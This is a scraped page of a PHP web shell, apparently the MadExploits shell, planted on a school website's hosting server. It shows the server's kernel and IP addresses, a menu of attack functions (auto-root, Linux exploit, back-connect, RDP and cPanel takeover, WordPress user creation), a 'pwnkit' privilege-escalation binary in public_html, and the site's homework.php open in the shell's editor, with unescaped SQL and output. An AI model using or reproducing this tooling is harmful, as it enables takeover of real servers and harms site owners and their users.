Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.220.194.29
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
nbspublicschool /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
nbs_website
[ DIR ]
drwxr-xr-x
.htaccess
370
B
-r-----r--
.mad-root
0
B
-rw-r--r--
contact.php
5.55
KB
-rw-r--r--
css.php
146
B
-rw-r--r--
disclosure.php
1.75
KB
-rw-r--r--
event.php
1.95
KB
-rw-r--r--
facility.php
3.72
KB
-rw-r--r--
faculty.php
2.17
KB
-rw-r--r--
homework.php
7.88
KB
-rw-r--r--
index.php
35.98
KB
-rw-r--r--
index2.php
14.7
KB
-rw-r--r--
msg.php
3.18
KB
-rw-r--r--
news.php
1.94
KB
-rw-r--r--
profile.php
5.65
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
syllabus.php
2.46
KB
-rw-r--r--
tc.php
3.74
KB
-rw-r--r--
tc_view.php
2.24
KB
-rw-r--r--
topper_result.php
1.73
KB
-rw-r--r--
video.php
1.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : homework.php
<?php include('include/header.php'); ?> <!--- breadcrumb ---> <div class="category_ flw"> <div class="container"> <div class="left_"> <h1>Home Work <span></span></h1> </div> <div class="right_"> <ul class="cat_navigation"> <li><a href="index">Home</a></li> <li><span class="ion-android-arrow-dropright-circle"></span></li> <li><a href="#">Home Work</a></li> </ul> </div> </div> </div> <!---// breadcrumb ---> <!--- side buttton ---> <div class="mybutton"> <a href="contact"><img src="images/cont.jpg" class="img-fluid" /></a> </div> <!---// side buttton ---> <main id="main" class="page_content page_blog"> <div class="container"> <div class="row"> <div class="col-md-12 col-lg-12"> <div class="sidebar flw"> <div class="new_post"> <ul class="tabs_menu"> <?php $sql_tab="select class from homework GROUP BY class"; $res_tab=mysqli_query($obj->mysqli,$sql_tab); $i=1; $flag=1; $num_tab=mysqli_num_rows($res_tab); $id_call = array(" ", "."); if($num_tab>0){ while($fet_tab=mysqli_fetch_assoc($res_tab)){ ?> <?php if($flag==1): ?> <li class="tab_current"> <a href="#<?php echo str_replace($id_call,'',$fet_tab['class']) ?>">Class :- <?php echo $fet_tab['class'] ?></a> <span></span> </li> <?php $flag=0; else: ?> <li> <a href="#<?php echo str_replace($id_call,'',$fet_tab['class']) ?>">Class :- <?php echo $fet_tab['class'] ?></a> <span></span> </li> <?php endif;?> <?php } } ?> </ul> <div class="tab"> <?php $sql="select * from homework GROUP BY class"; $res=mysqli_query($obj->mysqli,$sql); $i=1; $flag=1; $num=mysqli_num_rows($res); $id_call = array(" ", "."); if($num>0){ while($fet=mysqli_fetch_assoc($res)){ ?> <?php if($flag==1): ?> <div id="<?php echo str_replace($id_call,'',$fet['class']) ?>" class="tab_block tab_content"> <div class="leftview flw"> <div class="questions flw"> <?php $sql_sub="SELECT ho.*,st.title_name from homework as ho JOIN subject_tit as st ON(st.subject_tit_id=ho.subject_tit_id) WHERE ho.class='$fet[class]'"; $res_sub=mysqli_query($obj->mysqli,$sql_sub); $num_sub=mysqli_num_rows($res_sub); if($num_sub>0){ while($fet_sub=mysqli_fetch_assoc($res_sub)){ if(!empty($fet_sub) && is_file('nbs_website/_saving/homework/'.$fet_sub['hw_file'])){ $download='<a href="nbs_website/_saving/homework/'.$fet_sub['hw_file'].'" target="_blank" class="btn btn-primary"> Download </a>'; } else{ $download=''; } ?> <div class="accordion"> <!-- Section 1 --> <div class="accordion_in"> <div class="acc_head"><span class="ion-android-open-book"></span>Subject :- <?php echo $fet_sub['title_name'] ?></div> <ul class="acc_content"> <li><p> Title of homework</p> </li> <li> <?= $download ?></li> <li><div class="mt30"><?php echo $fet_sub['description'] ?></div></li> </ul> </div> <!-- Section 1 --> </div> <?php } } ?> </div> </div> </div> <?php $flag=0; else: ?> <div id="<?php echo str_replace($id_call,'',$fet['class']) ?>" class="tab_content"> <div class="leftview flw"> <div class="questions flw"> <?php $sql_sub="SELECT ho.*,st.title_name from homework as ho JOIN subject_tit as st ON(st.subject_tit_id=ho.subject_tit_id) WHERE ho.class='$fet[class]'"; $res_sub=mysqli_query($obj->mysqli,$sql_sub); $num_sub=mysqli_num_rows($res_sub); if($num_sub>0){ while($fet_sub=mysqli_fetch_assoc($res_sub)){ if(!empty($fet_sub) && is_file('nbs_website/_saving/homework/'.$fet_sub['hw_file'])){ $download='<a href="nbs_website/_saving/homework/'.$fet_sub['hw_file'].'" target="_blank" class="btn btn-primary"> Download Homework </a>'; } else{ $download=''; } ?> <div class="accordion"> <!-- Section 1 --> <div class="accordion_in"> <div class="acc_head"><span class="ion-android-open-book"></span>Subject :- <?php echo $fet_sub['title_name'] ?></div> <ul class="acc_content"> <li><p> Title of homework</p> </li> <li><?= $download ?></li> <li> <div class="mt30"><?php echo $fet_sub['description'] ?></div></li> </ul> </div> <!-- Section 1 --> </div> <?php } } ?> </div> </div> </div> <?php endif;?> <?php } } ?> </div> </div> </div> </div> <!-- end blog sidebar --> </div> </div> </main> <?php include('include/footer.php'); ?>
Close